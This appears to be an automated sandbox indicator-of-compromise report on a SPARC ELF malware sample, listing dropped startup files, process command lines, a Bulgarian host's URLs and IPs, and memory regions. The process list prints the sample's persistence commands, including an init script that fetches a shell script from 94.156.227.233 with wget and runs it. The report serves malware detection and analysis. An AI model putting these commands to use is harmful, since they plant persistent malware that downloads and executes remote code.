IOC Report
sparc.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
sparc.nn.elf
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/sparc.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.XU5WUT (deleted)
data
dropped

Processes

Path
Cmdline
Malicious
/tmp/sparc.nn.elf
/tmp/sparc.nn.elf
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n /tmp/sparc.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf"
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/sparc.nn.elf
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/sparc.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf
/tmp/sparc.nn.elf
-
/tmp/sparc.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
There are 30 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
94.156.227.234
unknown
Bulgaria
malicious
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f5154029000
page execute read
malicious
7ffd72d56000
page read and write
559e2a47b000
page read and write
7ffd72d7a000
page execute read
7f525cd5e000
page read and write
559e267cd000
page read and write
7f515403f000
page read and write
7f525c266000
page read and write
559e287eb000
page read and write
7f525c274000
page read and write
559e287d4000
page execute and read and write
7f525cdab000
page read and write
7f5254000000
page read and write
7f525c8ea000
page read and write
7f525cd66000
page read and write
7f525cc35000
page read and write
7f525c503000
page read and write
559e267d6000
page read and write
7f525ba63000
page read and write
7f515403a000
page read and write
7f525c8c5000
page read and write
559e2659f000
page execute read
7f5254021000
page read and write
There are 13 hidden memdumps, click here to show them.